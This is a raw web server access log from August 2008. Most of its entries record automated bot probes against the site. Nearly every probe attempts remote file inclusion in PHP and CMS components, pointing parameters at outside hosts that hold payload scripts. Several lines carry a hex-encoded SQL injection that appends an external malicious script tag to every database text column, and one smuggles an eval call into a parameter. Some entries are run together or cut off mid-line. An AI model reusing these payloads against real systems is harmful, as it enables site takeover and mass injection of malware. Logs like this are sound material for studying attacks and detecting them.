70.156.106.172 - - [18/Aug/2008:09:00:13 -0700] "GET /logs/access_080213.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B404elitepuppies1/us1:70.22.201.130.79.130 - - [18/Aug/2008:09:00:18 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:26 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:37 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:37 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:38 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:38 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.156.106.172 - - [18/Aug/2008:09:00:40 -0700] "GET /logs/access_080213.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043markgbudnick/us1:70.60.1201.130.79.130 - - [18/Aug/2008:09:00:48 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:48 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:09:00:49 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:09:00:49 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:51 -0700] "GET //?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 200 11000 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:53 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:53 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:00:56 -0700] "GET //?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 200 11000 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:01:05 -0700] "GET /logs/access_080605.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:01:13 -0700] "GET /logs/access_080626.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:22 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:22 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:23 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:23 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:23 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:23 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:34 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:34 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:01:36 -0700] "GET /logs/access_080131.log/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:01:36 -0700] "GET /errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:01:38 -0700] "GET /logs/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:39 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:01:39 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:09:01:42 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:09:01:43 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.200.223 - - [18/Aug/2008:09:01:46 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.200.223 - - [18/Aug/2008:09:01:46 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.200.223 - - [18/Aug/2008:09:01:46 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:01:47 -0700] "GET /logs/access_080706.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:01:47 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:01:50 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:01:50 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:09:02:01 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:09:02:01 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:09:02:01 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:08 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:09:02:43 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:47 -0700] "GET /logs/access_080117.log//sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:48 -0700] "GET //sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:48 -0700] "GET /logs//sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:50 -0700] "GET /logs/access_080117.log//sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:50 -0700] "GET //sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:51 -0700] "GET /logs//sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:51 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:52 -0700] "GET //sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:02:52 -0700] "GET /logs//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:02:58 -0700] "GET /logs/access_080108.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:02:58 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:02:59 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:03:03 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:03:03 -0700] "GET //sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:03:04 -0700] "GET /logs//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.227.66 - - [18/Aug/2008:09:03:06 -0700] "GET /logs/access_071229.log//modules/My_eGallery/public/displayCategory.php?basepath=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.227.66 - - [18/Aug/2008:09:03:06 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.227.66 - - [18/Aug/2008:09:03:07 -0700] "GET /logs/access_071229.log//modules/My_eGallery/public/displayCategory.php?basepath=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.227.66 - - [18/Aug/2008:09:03:07 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:03:24 -0700] "GET /logs/access_080404.log/modules/My_eGallery/index.php?basepath=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:03:34 -0700] "GET /logs/access_080404.log/modules/My_eGallery/index.php?basepath=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:03:41 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:03:42 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.21.66 - - [18/Aug/2008:09:03:49 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [18/Aug/2008:09:03:49 -0700] "GET //codebb/lang_select?phpbb_root_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [18/Aug/2008:09:03:49 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:09:03:50 -0700] "GET /logs/access_080201.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:03:58 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:04:00 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:04:09 -0700] "GET /logs/access_080215.log//sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:04:09 -0700] "GET /logs/access_080215.log//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:04:10 -0700] "GET /logs/access_080215.log//sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:04:16 -0700] "GET /logs/access_080215.log//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.236.242 - - [18/Aug/2008:09:04:16 -0700] "GET /logs/access_080226.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hosting.501hosting.com/~mainhack/RL/rule/mod.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [18/Aug/2008:09:04:16 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hosting.501hosting.com/~mainhack/RL/rule/mod.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [18/Aug/2008:09:04:16 -0700] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hosting.501hosting.com/~mainhack/RL/rule/mod.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:04:17 -0700] "GET /logs/access_080408.log/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:04:17 -0700] "GET /errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:04:17 -0700] "GET /logs/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:04:19 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.175.120.167 - - [18/Aug/2008:09:04:21 -0700] "GET /bikes/dteel/2008_08_17/IMG_4447plack.JPG HTTP/1.1" 200 228191 "http://www.st-owners.com/forums/showthread.php?t=42795&page=8" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
76.175.120.167 - - [18/Aug/2008:09:04:21 -0700] "GET /bikes/dteel/2008_08_17/IMG_5163s.JPG HTTP/1.1" 200 325776 "http://www.st-owners.com/forums/showthread.php?t=42795&page=8" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
76.175.120.167 - - [18/Aug/2008:09:04:21 -0700] "GET /bikes/dteel/2008_08_17/IMG_4445tag.JPG HTTP/1.1" 200 311123 "http://www.st-owners.com/forums/showthread.php?t=42795&page=8" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
65.55.211.25 - - [18/Aug/2008:09:04:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
205.234.200.223 - - [18/Aug/2008:09:04:36 -0700] "GET /logs/access_080808.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.25 - - [18/Aug/2008:09:04:36 -0700] "GET /blog/wp-login.php HTTP/1.1" 200 1860 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
87.226.77.5 - - [18/Aug/2008:09:04:38 -0700] "GET /logs/access_080127.log//modules/vwar/admin/errors.php?error=http://ellanaturner.com/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [18/Aug/2008:09:04:38 -0700] "GET //modules/vwar/admin/errors.php?error=http://ellanaturner.com/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [18/Aug/2008:09:04:38 -0700] "GET /logs//modules/vwar/admin/errors.php?error=http://ellanaturner.com/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:04:38 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://albforum.freehostia.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:04:39 -0700] "GET /lostpasswd.php?env[include_prefix]=http://albforum.freehostia.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [18/Aug/2008:09:04:44 -0700] "GET /logs/access_080214.log//codebb/lang_select?phpbb_root_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.226.77.5 - - [18/Aug/2008:09:04:52 -0700] "GET /logs/access_080219.log//modules/vwar/admin/errors.php?error=http://ellanaturner.com/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
92.0.19.228 - - [18/Aug/2008:09:04:56 -0700] "GET /logs/access_080219.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432Bbrownstoneschool/us1:65.92.0.19.228 - - [18/Aug/2008:09:04:57 -0700] "GET /logs/access_080219.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B2emapstore/us1:66.231.233212.227.65.79 - - [18/Aug/2008:09:05:19 -0700] "GET /logs/access_080213.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:05:19 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:05:20 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
